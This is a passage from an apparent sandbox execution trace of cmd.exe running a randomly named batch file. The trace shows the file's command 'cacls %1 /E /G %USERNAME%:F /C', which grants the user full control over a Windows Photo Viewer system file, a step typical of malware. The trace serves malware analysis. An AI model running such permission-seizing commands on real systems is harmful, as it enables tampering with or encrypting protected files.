lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x38, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x1, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x1, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x0, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x40, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x40, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x40, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegCloseKey (hKey=0x94) returned 0x0 [0296.304] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47eb8c | out: phkResult=0x47eb8c*=0x94) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x40, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x1, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x1, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x0, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x9, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x4, lpData=0x47eb98*=0x9, lpcbData=0x47eb94*=0x4) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47eb90, lpData=0x47eb98, lpcbData=0x47eb94*=0x1000 | out: lpType=0x47eb90*=0x0, lpData=0x47eb98*=0x9, lpcbData=0x47eb94*=0x1000) returned 0x2 [0296.304] RegCloseKey (hKey=0x94) returned 0x0 [0296.304] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b0 [0296.304] srand (_Seed=0x5bb432b0) [0296.304] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"\"" [0296.304] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"\"" [0296.304] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.305] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b7ed8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0296.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0296.305] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0296.305] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0296.305] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0296.305] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0296.305] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0296.305] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0296.305] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0296.305] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0296.305] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0296.305] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0296.305] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0296.305] GetEnvironmentStringsW () returned 0x7b80e8* [0296.306] FreeEnvironmentStringsA (penv="A") returned 1 [0296.306] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.306] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0296.306] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0296.306] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0296.306] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0296.306] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0296.306] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0296.306] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0296.306] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0296.306] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0296.306] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x47f964 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.306] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x47f964, lpFilePart=0x47f95c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47f95c*="Desktop") returned 0x1d [0296.306] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.631] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x47f6e0 | out: lpFindFileData=0x47f6e0) returned 0x7b05c8 [0296.631] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0296.631] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x47f6e0 | out: lpFindFileData=0x47f6e0) returned 0x7b05c8 [0296.631] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0296.632] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0296.632] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x47f6e0 | out: lpFindFileData=0x47f6e0) returned 0x7b05c8 [0296.632] FindClose (in: hFindFile=0x7b05c8 | out: hFindFile=0x7b05c8) returned 1 [0296.632] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0296.632] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0296.632] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0296.632] GetEnvironmentStringsW () returned 0x7b80e8* [0296.632] FreeEnvironmentStringsA (penv="=") returned 1 [0296.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.633] GetConsoleOutputCP () returned 0x1b5 [0296.770] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.770] GetUserDefaultLCID () returned 0x409 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x47fa94, cchData=128 | out: lpLCData="0") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x47fa94, cchData=128 | out: lpLCData="0") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x47fa94, cchData=128 | out: lpLCData="1") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0296.770] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0296.770] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0296.771] GetConsoleTitleW (in: lpConsoleTitle=0x7ba9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.937] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0296.937] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0296.937] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0296.938] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0296.938] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0296.938] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0296.938] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0296.938] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0296.938] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0296.938] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0296.940] GetConsoleTitleW (in: lpConsoleTitle=0x47f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.003] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0297.003] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0297.003] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0297.004] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0297.004] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0297.004] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0297.004] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0297.004] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0297.004] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0297.004] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0297.004] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0297.004] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0297.004] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0297.004] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0297.004] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0297.004] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0297.004] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0297.004] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0297.004] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0297.004] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0297.004] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0297.004] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0297.004] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0297.004] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0297.004] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0297.004] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0297.004] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0297.004] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0297.004] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0297.004] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0297.004] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0297.004] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0297.004] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0297.004] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0297.004] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0297.004] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0297.004] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0297.005] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0297.005] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0297.005] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0297.005] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0297.005] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0297.005] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0297.005] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0297.005] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0297.005] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0297.005] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0297.005] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0297.005] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0297.005] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0297.005] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0297.005] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0297.005] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0297.005] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0297.005] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0297.005] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0297.005] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0297.005] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0297.005] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0297.005] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0297.005] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0297.005] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0297.005] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0297.005] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0297.005] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0297.005] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0297.005] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0297.005] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0297.005] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0297.005] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0297.006] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0297.006] SetErrorMode (uMode=0x0) returned 0x0 [0297.006] SetErrorMode (uMode=0x1) returned 0x0 [0297.006] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x7b05d0, lpFilePart=0x47f28c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47f28c*="Desktop") returned 0x1d [0297.006] SetErrorMode (uMode=0x0) returned 0x1 [0297.006] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0297.006] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.009] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.009] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x47f038, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47f038) returned 0x7bb1b8 [0297.009] FindClose (in: hFindFile=0x7bb1b8 | out: hFindFile=0x7bb1b8) returned 1 [0297.009] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0297.009] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0297.009] GetConsoleTitleW (in: lpConsoleTitle=0x47f50c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.164] ApiSetQueryApiSetPresence () returned 0x0 [0297.164] ResolveDelayLoadedAPI () returned 0x745414a0 [0297.165] SaferWorker () returned 0x0 [0297.178] SetErrorMode (uMode=0x0) returned 0x0 [0297.178] SetErrorMode (uMode=0x1) returned 0x0 [0297.178] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x7bad80, lpFilePart=0x47f3bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x47f3bc*="vRnqNMBW.bat") returned 0x2a [0297.178] SetErrorMode (uMode=0x0) returned 0x1 [0297.178] wcsspn (_String=" \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"", _Control=" \x09") returned 0x1 [0297.178] CmdBatNotificationStub () returned 0x1 [0297.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x47f44c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0297.179] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0297.179] _get_osfhandle (_FileHandle=3) returned 0xb4 [0297.179] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0297.179] _get_osfhandle (_FileHandle=3) returned 0xb4 [0297.179] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0297.179] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x47f41c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x47f41c*=0xe2, lpOverlapped=0x0) returned 1 [0297.180] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0297.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0297.180] _get_osfhandle (_FileHandle=3) returned 0xb4 [0297.180] GetFileType (hFile=0xb4) returned 0x1 [0297.180] _get_osfhandle (_FileHandle=3) returned 0xb4 [0297.180] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0297.181] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0297.181] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0297.181] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0297.181] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0297.181] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0297.181] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0297.181] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0297.181] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0297.183] _tell (_FileHandle=3) returned 32 [0297.183] _close (_FileHandle=3) returned 0 [0297.183] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x47f1e0 | out: _Buffer="\r\n") returned 2 [0297.183] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.183] GetFileType (hFile=0x3c) returned 0x2 [0297.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.183] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f1b8 | out: lpMode=0x47f1b8) returned 1 [0297.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.337] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x47f1d0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x47f1d0*=0x2) returned 1 [0297.369] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.369] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.369] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x47f1dc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0297.369] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x47f1dc | out: _Buffer=">") returned 1 [0297.369] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.369] GetFileType (hFile=0x3c) returned 0x2 [0297.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.369] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f1bc | out: lpMode=0x47f1bc) returned 1 [0297.558] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.558] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x47f1d4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x47f1d4*=0x1e) returned 1 [0298.064] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.064] GetFileType (hFile=0x3c) returned 0x2 [0298.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0298.064] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x47f45c | out: lpMode=0x47f45c) returned 1 [0298.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.277] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7b7960*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x47f474, lpReserved=0x0 | out: lpBuffer=0x7b7960*, lpNumberOfCharsWritten=0x47f474*=0x5) returned 1 [0299.132] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x47f47c | out: _Buffer=" \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" /E /G CIiHmnxMn6Ps:F /C ") returned 94 [0299.132] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.132] GetFileType (hFile=0x3c) returned 